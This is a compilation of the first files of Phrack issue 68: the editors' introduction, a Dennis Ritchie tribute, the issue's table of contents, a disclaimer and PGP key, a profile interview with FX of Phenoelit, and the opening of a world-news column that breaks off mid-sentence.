==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x01 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ Introduction ]=----------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------=[ by the Phrack staff ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ April 14, 2012 ]=-------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
"C is quirky, flawed, and an enormous success."
|
|
-- Dennis Ritchie
|
|
|
|
October 2011, a legend has fallen...
|
|
|
|
_____.______.______._____
|
|
\`\ /'/
|
|
\ | | /
|
|
>|___,____,____,___|<
|
|
/d$$$P ,ssssssssssss. \
|
|
/d$$$P ,d$$$$$$$$$$$$$b \
|
|
<=====w======w======w=====>
|
|
\ \____> \_____/ <____/ /
|
|
\_____________________/ pb
|
|
|
|
|
|
Dennis Ritchie, proud father of nothing less than our beloved C language
|
|
and UNIX operating system, is gone. While the world has been crying over
|
|
the loss of Steve Jobs, little has been written about Dennis' death. Saying
|
|
that his inventions influenced the hacking community in a way even he
|
|
probably never knew is _not_ an exaggeration. Think about it: how many of
|
|
us became hackers because we discovered C, related bugs or UNIX?
|
|
|
|
Dennis, the world might not be aware of your unbelievable contribution but
|
|
we are. Farewell dear friend, may you rest in peace.
|
|
|
|
-- anonymous bug hunter
|
|
|
|
|
|
-----( Dark Thoughts )-----
|
|
|
|
Today I woke up thinking about the death of that little Chinese girl [1]. I
|
|
felt bad. It's true that watching the youtube video was disturbing but
|
|
something kept nagging at me. What if the incident had occurred in my
|
|
country? Would people really have behaved any differently? I have doubts.
|
|
Just because a video leaked on the Internet people conveniently blamed
|
|
China, a country both controversial and feared.
|
|
|
|
What if modern society in general were slowly becoming amoral
|
|
and cold? Proof is that we all watched this video fully aware of its
|
|
content. Vicious, aren't we? But not only that. We're also fucking cowards.
|
|
Suddenly discovering that there is a darkness hidden inside the very roots
|
|
of our society is dramatic. But pretending to ignore the fact that there
|
|
are countries in this world where atrocious massacres are part of the daily
|
|
life seems fine.
|
|
|
|
It was written in the US Declaration of Independence that "We hold these
|
|
truths to be self-evident, that all men are created equal [...]". How could
|
|
that possibly be true? This morning I was at home, healthy, comfortably
|
|
sitting in front of my computer screen, with a cup of coffee in hand. A few
|
|
minutes later, I was working (or luxuriously pretending to be) to earn
|
|
money that I spent at the bar that night with my friends. In the meantime,
|
|
not so far away, people were killed, raped, mutilated. The truth is that I
|
|
don't even care when I think about it. This morning I was pretending to be
|
|
concerned for other people, but tonight I don't give a shit anymore.
|
|
|
|
Something must be wrong.
|
|
|
|
-- anonymous coward / Phrack
|
|
|
|
|
|
[1] http://www.chinapost.com.tw/china/national-news/2011/10/21/320549/
|
|
Chinese-girl.htm
|
|
|
|
|
|
-----( Phrack Issue #68 )-----
|
|
|
|
Hello Phrackers! How are you guys doing? We hope well. We hope your latest
|
|
exploit works reliably (again) and all your bounces are alive and pinging.
|
|
We also hope you and your friends still are out of prison, or recently came
|
|
out (wink wink). Us, we're doing good. Looks like we did it again and a new
|
|
release is here. Ya-hoo.
|
|
|
|
This release brings you an amazing selection of hacking goodies. We have
|
|
two papers on applied cryptanalysis by greg and SysK, an area in which we
|
|
hope to see more submissions for the next issues. We are also thrilled
|
|
about the return of the Art of Exploitation section. And what a return; we
|
|
have for you not one, but two detailed papers demonstrating that
|
|
exploitation is indeed an art form. Speaking of exploitation, did you ever
|
|
wonder what Firefox, FreeBSD and NetBSD have in common? Read the paper by
|
|
argp & huku and find out. Are you hacking Windows' farms? Be sure to check
|
|
the p1ckp0ck3t's novel approach of stealing Active Directory password
|
|
hashes. Perhaps you prefer malware analysis and identification of malware
|
|
families; Pouik and G0rfi3ld have written a paper with a focus on Android
|
|
malware that will satisfy you. Android is quickly becoming the standard
|
|
mobile platform. I think it's time for an Android/ARM kernel rootkit. Start
|
|
from dong-hoon you's paper and hack your own. styx^ continues the kernel
|
|
fun with a paper that updates truff's LKM infection techniques to 2.6.x and
|
|
3.x Linux kernels. If for whatever reason you're afraid of messing with
|
|
your kernels, Crossbower shows you how to create a stealthy userland
|
|
backdoor without creating new processes or threads.
|
|
|
|
We also believe that you will find merit in the two main non-technical
|
|
papers of this issue. Both address more or less the same topics, but from
|
|
two totally different points of view. On one hand, we have an analysis of
|
|
how the happiness that hacking brings to all of us can be and is corrupted by
|
|
the security industry. On the other, a call to all hackers to take a side
|
|
between staying true to the spirit of hacking and selling out to the
|
|
military intelligence industrial complex. Read them, think about them and
|
|
take a side. Remember, "The hottest places in hell are reserved for those
|
|
who in times of great moral crisis maintain their neutrality".
|
|
|
|
Phrack World News is also making a comeback, courtesy of TCLH. In
|
|
International Scenes we explore Korea and the past of the Greek scene.
|
|
Loopback has grown and we decided to resurrect Linenoise as we had some
|
|
tiny but no less interesting submissions. While getting a full paper into an
|
|
issue remains hard, submitting to Linenoise may be an easier way for
|
|
people to share tricks in the next issues.
|
|
|
|
We are proud to have FX prophiled in this epic issue. As an added gift, FX
|
|
wrote a eulogy for PH-Neutral, at least in its original form. PH-Neutral,
|
|
as all great hacker creations, lives on as long as the hackers behind it
|
|
are fueling it with their passion.
|
|
|
|
Speaking of hacker passion, this issue re-establishes a long lost
|
|
connection. Phrack and SummerCon are again bonded on the 25th anniversary
|
|
of SummerCon! Shmeck and redpantz, representing SummerCon, contribute two
|
|
papers; a history of the conference from its beginning in 1987 to this
|
|
year, and of course one of the Art of Exploitation papers.
|
|
|
|
Believe it or not it was _fucking_ hard to prepare this issue. It's no news
|
|
that the mentality of the hacking community has changed, but this time we
|
|
had to face multiple deceptions. It's not the first time, but this time the
|
|
sheer quantity is scary. It demonstrates how rotten and corrupted
|
|
the so-called spirit of some people pretending to be part of the
|
|
underground has become.
|
|
|
|
There's a time when you realize that you've lost count of the battles you
|
|
lost, but you still kinda won enough to keep faith. More importantly, you
|
|
realize that you still care. Granted, it's not the deep, mystical and life
|
|
changing moment that movies display -- the huge pile of shit you pushed out
|
|
of the door just before going to sleep is still there. Maybe it just
|
|
stinks a little less.
|
|
|
|
But we care, hell, we really care about Phrack and what it means. It costs
|
|
time and frustration, many battles lost, it faces the two-point-oh
|
|
revolution (lots of quality stuff goes into blogs, for immediate
|
|
consumption) and the money drop by the security industry, but the
|
|
satisfaction of seeing it out again is huge. Yes, we care.
|
|
|
|
And that's not just because we're a bunch of old farts that stay attached
|
|
to the past. We care because it's a constant, maybe feeble but constant,
|
|
heartbeat of that world, that community that we grew up in and now live in.
|
|
You know, that little thing called 'the Underground' that we are proud and
|
|
honored to somehow, in part, represent.
|
|
|
|
We've heard from many corners that 'the Underground' is dead. We'd love to
|
|
hear those people describe what the Underground is, then. Sure, things
|
|
change, evolve. Laws, computing power, money invested, political links,
|
|
technology, every piece moves fast and reshapes the landscape. But if
|
|
you're reading these lines today, if you've just finished a 36-hour
|
|
coding, hacking marathon, you're keeping it alive.
|
|
|
|
So thank you, for that. Thank you to the authors for finding the time to
|
|
share their knowledge. Thank you to anyone who sets up a new connection.
|
|
Thank you to whoever fights for information and freedom. Thanks, crews.
|
|
|
|
Happy hacking, Phrackers.
|
|
You guys are the BEST heartbeat in the world.
|
|
|
|
|
|
-- the Phrack staff
|
|
|
|
|
|
______ _ _ ______ ______ _ _ __ _ __ _____
|
|
(_____ \| | | (_____ \ /\ / _____) | / ) _| || |_ / / / ___ \
|
|
_____) ) |__ | |_____) ) / \ | / | | / / (_ || _) / /_ ( ( ) )
|
|
| ____/| __)| (_____ ( / /\ \| | | |< < _| || |_ / __ \ > > < <
|
|
| | | | | | | | |__| | \_____| | \ \ (_ || _| (__) | (___) )
|
|
|_| |_| |_| |_|______|\______)_| \_) |__||_| \____/ \_____/
|
|
|
|
|
|
- By the community, for the community. -
|
|
|
|
|
|
$ cat p68/index.txt
|
|
|
|
<--------------------------( Table of Contents )-------------------------->
|
|
|
|
0x01 Introduction ...................................... Phrack Staff
|
|
|
|
0x02 Phrack Prophile on FX ............................. Phrack Staff
|
|
|
|
0x03 Phrack World News ................................. TCLH
|
|
|
|
0x04 Linenoise ......................................... various
|
|
|
|
0x05 Loopback .......................................... Phrack Staff
|
|
|
|
0x06 Android Linux Kernel Rootkit ...................... dong-hoon you
|
|
|
|
0x07 Happy Hacking ..................................... Anonymous
|
|
|
|
0x08 Practical cracking of white-box implementations ... SysK
|
|
|
|
0x09 Single Process Parasite ........................... Crossbower
|
|
|
|
0x0a Pseudomonarchia jemallocum ........................ argp & huku
|
|
|
|
0x0b Infecting loadable kernel modules ................. styx^
|
|
|
|
0x0c The Art of Exploitation:
|
|
MS IIS 7.5 Remote Heap Overflow ................... redpantz
|
|
|
|
0x0d The Art of Exploitation:
|
|
Exploiting VLC, a jemalloc case study ............. huku & argp
|
|
|
|
0x0e Secure Function Evaluation vs. Deniability in OTR
|
|
and similar protocols ............................. greg
|
|
|
|
0x0f Similarities for Fun and Profit ................... Pouik & G0rfi3ld
|
|
|
|
0x10 Lines in the Sand: Which Side Are You On in the
|
|
Hacker Class War .................................. Anonymous
|
|
|
|
0x11 Abusing Netlogon to steal an Active Directory's
|
|
secrets ........................................... the p1ckp0ck3t
|
|
|
|
0x12 25 Years of SummerCon ............................. Shmeck
|
|
|
|
0x13 International Scenes .............................. various
|
|
|
|
<------------------------------------------------------------------------->
|
|
|
|
|
|
-----( GreetZ for issue #68 )-----
|
|
|
|
- FX: epicness personified
|
|
- herm1t: you have our support
|
|
- TCLH: for everything
|
|
- x82: deepest apologies for the 1 year wait
|
|
- anonymous authors: best part of this issue
|
|
- sysk: keep submitting man!
|
|
- redpantz & Shmeck: Phrack and SummerCon bonded again
|
|
- greg: schooling Alice and Bob
|
|
- Crossbower: parasite zoologist
|
|
- the p1ckp0ck3t: be wary or he will get your hashes
|
|
- huku & argp: the scourge of memory allocators
|
|
- styx^: yes we are hardcore reviewers
|
|
- Pouik & G0rfi3ld: who the hell is G0rfi3ld??? ;>
|
|
- scene phile writers: you have big balls guyz
|
|
- linenoise writers: Eva you're soooooooo cute :3
|
|
- our generous hoster: a contribution not forgotten ;)
|
|
- z4ppy, ender: external reviews are paid in beers
|
|
- b3n: too bad we didn't use your stuff
|
|
- No greetz, no thankz to: you know who you are :<
|
|
|
|
And of course many thanks to the loopback contributors :')
|
|
|
|
|
|
-----( Phrack Magazine's policy )-----
|
|
|
|
phrack:~# head -n 22 /usr/include/std-disclaimer.h
|
|
/*
|
|
* All information in Phrack Magazine is, to the best of the ability of
|
|
* the editors and contributors, truthful and accurate. When possible,
|
|
* all facts are checked, all code is compiled. However, we are not
|
|
* omniscient (hell, we don't even get paid). It is entirely possible
|
|
* something contained within this publication is incorrect in some way.
|
|
* If this is the case, please drop us some email so that we can correct
|
|
* it in a future issue.
|
|
*
|
|
*
|
|
* Also, keep in mind that Phrack Magazine accepts no responsibility for
|
|
* the entirely stupid (or illegal) things people may do with the
|
|
* information contained herein. Phrack is a compendium of knowledge,
|
|
* wisdom, wit, and sass. We neither advocate, condone nor participate
|
|
* in any sort of illicit behavior. But we will sit back and watch.
|
|
*
|
|
*
|
|
* Lastly, it bears mentioning that the opinions that may be expressed in
|
|
* the articles of Phrack Magazine are intellectual property of their
|
|
* authors.
|
|
* These opinions do not necessarily represent those of the Phrack Staff.
|
|
*/
|
|
|
|
-----( Contact Phrack Magazine )-----
|
|
|
|
|
|
< Editors : staff[at]phrack{dot}org >
|
|
> Submissions : staff[at]phrack{dot}org <
|
|
< Commentary : loopback[@]phrack{dot}org >
|
|
> Phrack World News : pwned[at]phrack{dot}org <
|
|
|
|
|
|
Submissions may be encrypted with the following PGP key:
|
|
(Hint: Always use the PGP key from the latest issue)
|
|
|
|
|
|
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
|
Version: PHRACK
|
|
|
|
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
|
|
=cK7U
|
|
-----END PGP PUBLIC KEY BLOCK-----
|
|
|
|
-----( EOF )-----
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x02 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ PHRACK PROPHILE ON ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ FX of Phenoelit ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|=---=[ Specifications
|
|
|
|
Handle: FX
|
|
AKA: 41414141
|
|
Handle origin: First and last letter of my first name
|
|
(I had no idea it had a meaning in movie production)
|
|
Produced in: East Germany
|
|
Urlz: http://www.phenoelit.de/
|
|
Computers: Metric tons of them
|
|
Creator of: much crappy and useless code
|
|
Member of: Phenoelit, Toolcrypt
|
|
Projects: PH-Neutral, Phonoelit
|
|
Codez: IRPAS (bunch of tools that somehow still cause havoc)
|
|
cd00r.c (later called PortKnocking by the copycats)
|
|
works-on-my-machine exploits
|
|
Active since: late 80s
|
|
Inactive since: unlikely to happen
|
|
|
|
|=---=[ Favorites
|
|
|
|
Actors: don't care
|
|
Films: Hackers (1995) - imagine it actually would be like that
|
|
Authors: Neal Stephenson, Iain M. Banks, Frank & Brian Herbert
|
|
Meetings: Bars
|
|
Sex: ACK
|
|
Books: Computer Security, Time-Life Books (1986), and it began
|
|
Novel: too many to list
|
|
Music: Progressive House Kitsch
|
|
Alcohol: Oh Yes!
|
|
Cars: Mercedes-Benz
|
|
Girls: SYN
|
|
Foods: German
|
|
I like: honesty, pragmatism, realism, tolerance, style, empathy
|
|
I dislike: fakes, aggression, ignorance, senselessness, deception
|
|
|
|
|=---=[ Describe your life in 3 sentences
|
|
|
|
Every work day is packed with challenges, great hacks and awesome people.
|
|
Every free day compensates with non-security hobbies and sleep.
|
|
This sentence is padding.
|
|
|
|
|=---=[ First contact with computers
|
|
|
|
At the age of 6 at the computing department of the university of Sofia,
|
|
Bulgaria. Didn't leave much of an impression, as I was only allowed to play
|
|
a silly game (in CGA color).
|
|
|
|
Second contact happened at the age of 9 or 10, a Robotron Z9001. It came
|
|
without software but with a typewritten programming manual for BASIC.
|
|
I read it cover to cover.
|
|
|
|
|=---=[ Passions: What makes you tick
|
|
|
|
Like-minded people: Conversations give me the greatest boost. Let me
|
|
explain something to a person who gets it, and I will have a new idea how
|
|
to take it further.
|
|
|
|
Also, work. That state of a problem where it is no longer fun, but actual
|
|
work, to get it where you want it. Not letting go. Stubbornness compensates
|
|
for a lot of talent.
|
|
|
|
|=---=[ Unix or Windows? Juniper or Cisco?
|
|
|
|
Unix and Windows. I like both, I use both, they both suck in their own
|
|
ways. The only thing you will not see me with is anything Apple.
|
|
|
|
Juniper, Cisco, all networking equipment is broken, Cisco being in the
|
|
lead. How can you sell equipment that is in most cases simply forwarding
|
|
IPv4 packets from interface 1 to interface 2 since 1987 and still crashes on
|
|
parsing IPv4 in 2011?
|
|
|
|
|=---=[ Color of hat?
|
|
|
|
undef($hat);
|
|
|
|
|=---=[ Entrance in the underground
|
|
|
|
First contact must have been around 1990. Shortly after the Berlin wall
|
|
came down, I got my first 80286 machine and hung out at a computer club in
|
|
a Thaelmann Pionieers' (youth organization of schoolchildren in East
|
|
Germany) youth center. In a back room, two older guys downloaded infrared
|
|
images from Russian satellites. While the download ran, they cracked PC
|
|
games for the kids to pass the time. First time I saw a hex dump.
|
|
|
|
I had the great honor to meet many people that I consider(ed) part of the
|
|
real underground. Some of them still are. But I don't think I was ever part
|
|
of that myself.
|
|
|
|
|=---=[ Which research have you done or which one gave you the most fun?
|
|
|
|
Anything I did was fun at the time, why do it otherwise? I generally
|
|
like fiddling around with bits and bytes more than hunting bugs in large
|
|
environments. Writing disassemblers, debuggers and the like is a pleasure.
|
|
It's also monkey work. But it lets you feel so much about the history and
|
|
design of a platform.
|
|
|
|
I also like network protocols, because you can often see the vulnerability
|
|
potential by reading the specifications already. Protocols are interfaces
|
|
and interfaces are where the bugs live. Also, logging functions love to use
|
|
packet contents and fixed buffers.
|
|
|
|
|=---=[ Personal general opinion about the underground
|
|
|
|
Much. Fucking. Respect.
|
|
|
|
Seriously, what is published is only the tip of an iceberg. Once you talk
|
|
to people, it's simply insane how much knowledge there is. Interestingly,
|
|
I have the impression that little of this knowledge is ever used.
|
|
|
|
One aspect often considered essential in the underground I dislike:
|
|
Owning people fails to impress me. It's like beating people up, everyone
|
|
can do that, and doing it is no achievement. If you found that
|
|
vulnerability yourself and made a custom exploit, that's an achievement.
|
|
|
|
|=---=[ Personal general opinion about the German underground
|
|
|
|
Regardless of the definition of underground, the hacking scene in Germany
|
|
is very alive and diverse. However, I would love to see more of them
|
|
write exploits.
|
|
|
|
|=---=[ Personal general opinion about the European underground
|
|
|
|
The U.S. is much more visible, but Old Europe kicks their ass any time.
|
|
Just looking at the French scene is scary. If only they would speak
|
|
English ;) And don't even get me started on east Europe and Russia.
|
|
|
|
|=---=[ Memorable experiences/hacks
|
|
|
|
- Finding my first overflow in Cisco IOS TFTP, resisting the urge to post
|
|
it immediately and deciding to write an exploit. Then realizing how much
|
|
of a journey lay ahead of me, since I had never written any exploit
|
|
before.
|
|
|
|
- Writing an exploit that needed to be stable, i.e. work in the wild. After
|
|
weeks of frustration finally understanding that PoC is only 10% of
|
|
exploit development. Halvar saving my ass again with a simple hint.
|
|
|
|
- Being asked by my employer to take the CISSP exam, being initially
|
|
rejected due to my "connections to hackers" as a DEFCON speaker, being
|
|
allowed to take the exam and finding a 12 octet MAC address in a
|
|
question. Finding out afterwards that (ISC)2 probably has more admin
|
|
users on their web servers than paying members.
|
|
|
|
- Asking someone to look at Cisco IOS exploitation after I spent about
|
|
a decade with it and getting my ass kicked in less than a week. True
|
|
talent trumps everything.
|
|
|
|
- Caesar's Challenge over the years: hearing about it, being invited in,
|
|
being told by Caesar that he accepts my solution, welcoming Caesar to
|
|
PH-Neutral.
|
|
|
|
- Being invited to train a team of hackers and later finding out that
|
|
the whole purpose of the exercise was to cure them from their respect
|
|
for me. And it worked.
|
|
|
|
- The nights in Wuxi (China) with the Wuxi Pwnage Team.
|
|
|
|
|=---=[ Memorable people you have met
|
|
|
|
- Halvar Flake
|
|
I have to thank this man for a lot of things in my life.
|
|
|
|
- Sergey Bratus
|
|
A great man with a great vision. He changed how I look at academia and
|
|
hacking. With people like Sergey, there is hope.
|
|
|
|
- John Lambert
|
|
One of the smartest men I've ever met. Just in case you wonder why
|
|
Windows exploitation is so challenging today.
|
|
|
|
- Dan Kaminsky
|
|
Dan and I share a passion for protocols. We first met in 2002, about five
|
|
times, at cons all over the planet, and talked IP(v4). Good times.
|
|
|
|
- ADM, that one summer
|
|
|
|
|=---=| Memorable places you have been to
|
|
|
|
- Idaho Falls
|
|
|
|
|=---=[ Disappointing people you have met
|
|
|
|
Many manufactured or self-styled experts giving presentations at
|
|
conferences. If you didn't write or at least read the code in question,
|
|
shut up. The number of charlatans is unfortunately growing steadily.
|
|
Some would probably count me in that category as well.
|
|
|
|
Also, friends who betray the very people that trust them most.
|
|
|
|
|=---=[ Who came up with the name "Phenoelit" and what does it mean?
|
|
|
|
Nothing to see here, move on.
|
|
|
|
|=---=[ Who are you guys?
|
|
|
|
Just friends.
|
|
|
|
|=---=[ Who designed those awesome Phenoelit t-shirts?
|
|
|
|
I always did the designs for Phenoelit and PH-Neutral. I greatly enjoy
|
|
doing them. For PH-Neutral, the process was that I had to come up with a
|
|
motif and would do all the work, Mumpi watching me, drinking beer and
|
|
complaining. It would not have worked any other way.
|
|
|
|
|=---=[ Phenoelit vs 7350 vs THC?
|
|
|
|
We met 7350 and THC first time at the 17c3 and became friends with several
|
|
of them over time. I sincerely miss 7350, but their time had come.
|
|
|
|
|=---=[ Things you are proud of
|
|
|
|
The team I am blessed to work with.
|
|
|
|
|=---=[ Things you are not proud of
|
|
|
|
- Writing shitty exploits
|
|
- Having a pretty good hand at picking research topics that are not
|
|
relevant to the real world
|
|
- Being strictly single-tasking
|
|
|
|
|=---=[ Most impressive hackers
|
|
|
|
- Dvorak
|
|
- Halvar Flake
|
|
- Philippe Biondi
|
|
- Ilja van Sprundel
|
|
- Anonpoet
|
|
- Greg
|
|
- Last Stage of Delirium
|
|
|
|
This list is biased by me not knowing many of the really impressive
|
|
hackers.
|
|
|
|
|=---=[ Opinion about security conferences
|
|
|
|
Security conferences have been essential for my personal development and I
|
|
still love to go to them. I have a preference for smaller cons, since it is
|
|
more likely to get to talk to people.
|
|
Almost any talk has something for me to take away. But more important is
|
|
the hallway track and going out with fellow hackers.
|
|
|
|
The distinction between hacker cons and corporate or product security
|
|
conferences used to be clear. It is no longer, which is sad.
|
|
|
|
|=---=[ Opinion on Phrack Magazine
|
|
|
|
IMHO one of the most well regarded e-zines in the world, influencing much
|
|
research over the time of its existence. Just look at how many academic
|
|
publications cite Phrack articles. Keep it up!
|
|
|
|
|=---=[ What you would like to see published in Phrack?
|
|
|
|
I think Phrack does just fine. For me, exploitation techniques are at
|
|
the heart of Phrack. I also enjoy reading about environments that not
|
|
many people have access to: control systems of all kinds, for example.
|
|
|
|
Maybe you should aim for more timely releases though.
|
|
|
|
|=---=[ Personal advices for the next generation
|
|
|
|
That implies that I'm old and expired, right?
|
|
|
|
The one advice I would give is: Don't care about the opinion of others when
|
|
it comes to research. It doesn't matter if they think it's cool, you must
|
|
think it's cool. Look for and credit prior art, build on what is there
|
|
already and have fun doing so.
|
|
|
|
And if you really have to use Python, understand that error handling is not
|
|
the same thing as stack traces. Catch your exceptions and handle them, or
|
|
at least display something useful.
|
|
|
|
|=---=[ Your opinion about the future of the underground
|
|
|
|
Predictions are hard, especially when they concern the future.
|
|
|
|
|=---=[ Shoutouts to specific (group of) peoples
|
|
|
|
To the hacker and vx groups of the 80s and 90s, who built the foundation
|
|
of everything we still concern ourselves with today.
|
|
|
|
|=---=[ Flames to specific (group of) peoples
|
|
|
|
To the snake-oil security product vendors, who refuse to innovate and bind
|
|
available talent in signature writing sweat jobs, because that model pays
|
|
them so well. Your "protections" add vulnerabilities to every aspect of
|
|
modern networks, and you know it. The halting problem is UNDECIDABLE!
|
|
|
|
|=---=[ Quotes
|
|
|
|
"Does it just look nice or is it correct?"
|
|
- zynamics developer about a control flow graph
|
|
|
|
"Nine out of the ten voices in my head say I'm not schizophrenic. The
|
|
other one hums the melody of Tetris."
|
|
|
|
|=---=[ Anything more you want to say
|
|
|
|
I would like to thank the Phrack staff for this honor, although I'm still
|
|
convinced there are 0x100 people who deserved it more.
|
|
|
|
|=---=[ A eulogy for PH-Neutral ]=---=|
|
|
|
|
We created PH-Neutral in 0x7d3 as an attempt to bring together the people
|
|
we respected most. We were simply unaware of the other small events that
|
|
already existed. The intention was to have an informal meeting with ad-hoc
|
|
workshops and a great party. We failed at the party, despite a full-blown
|
|
dance floor. However, the people actually worked together and discussed
|
|
their projects and exploits. We were sending out the invitations
|
|
individually by email and I was surprised about the many positive
|
|
reactions. We would not have thought that so many well-known and
|
|
interesting people would actually show up.
|
|
|
|
Over the years, the event grew. Although we kept it invite-only, the
|
|
mechanism for invitations had to consider people that were there in the
|
|
past as well as fresh blood. Therefore, one way or another, it had a
|
|
snowball effect. But in the early years, this was a good thing. There
|
|
was an astonishing amount of innovation going on during the first five
|
|
years. We never expected to see people actually working together. It was
|
|
the time of sharing code and knowledge, of searching for JTAG on a dance
|
|
floor and of the Vista ASLR release.
|
|
|
|
The bigger the event got, the more the focus shifted from hacking to party.
|
|
Since that corresponded with our second initial goal, we did encourage it.
|
|
We really like to party with our friends, and by party we mean actual
|
|
dancing and not just standing around and getting drunk. It was amazing
|
|
to see how well the party developed over the years. Despite the growth,
|
|
it still had a very intimate feeling.
|
|
|
|
Initially meant as a joke during setup of the second PH-Neutral, we had
|
|
decided to not have it run forever. For one, we didn't want to see it going
|
|
down and fading away. When more and more conferences started to show up on
|
|
the map, it only encouraged us to conclude the story of PH-Neutral. It had
|
|
its time and place.
|
|
|
|
The last PH-Neutral 0x7db then proved that the decision was right. It was
|
|
that little bit of too many people that turns a large group of
|
|
international friends into a somewhat anonymous crowd. Although luckily
|
|
not many guests noticed, it changed the way we had to run the event
|
|
completely. Where in the years before, we could hack and party with our
|
|
friends, we had to fire-fight, manage and regulate. That was not the way it
|
|
was meant to be for us, so it was a good time to call it quits.
|
|
|
|
PH-Neutral was made into what it was by the people that participated, more
|
|
so than any other event I know. The people decided on the spin of each
|
|
year's event by how they filled the frame we gave them. It was their
|
|
party and they took it and made it great. Thank you forever!
|
|
|
|
[ EOF ]
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x03 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ Phrack World News ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------------=[ by TCLH ]=------------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
It has been a while since the last Phrack World News, and much has happened
|
|
in our world since then. Governments have been overthrown [1], human rights
|
|
partially restored in one country, and taken away in the next [2]. The
|
|
so-called first world has been bought, delivers monitoring and suppression
|
|
equipment to totalitarian countries [3] as well as making its use a legal
|
|
requirement at home [4]. The content mafia, considering every form of
|
|
creative and work output their property, has declared war on all internet
|
|
